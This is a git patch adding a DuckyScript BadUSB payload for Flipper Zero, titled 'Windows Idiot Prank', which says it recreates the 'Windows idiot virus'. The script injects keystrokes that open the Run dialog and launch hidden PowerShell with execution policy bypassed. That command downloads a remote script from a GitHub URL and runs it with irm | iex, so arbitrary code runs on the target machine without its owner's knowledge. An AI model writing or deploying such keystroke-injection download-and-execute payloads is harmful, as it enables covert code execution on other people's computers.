From edca26313ffea20808f737c34f04dc5faaf2be25 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 29 May 2024 18:58:29 +0000 Subject: [PATCH] Add files via upload --- Windows-Idiot-Prank/Windows-Idiot-Prank.txt | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 Windows-Idiot-Prank/Windows-Idiot-Prank.txt diff --git a/Windows-Idiot-Prank/Windows-Idiot-Prank.txt b/Windows-Idiot-Prank/Windows-Idiot-Prank.txt new file mode 100644 index 0000000..309e380 --- /dev/null +++ b/Windows-Idiot-Prank/Windows-Idiot-Prank.txt @@ -0,0 +1,17 @@ + +REM Title: Windows Idiot Prank +REM Author: @beigeworm +REM Description: This script recreates the Windows idiot virus in powershell +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | iex +ENTER + +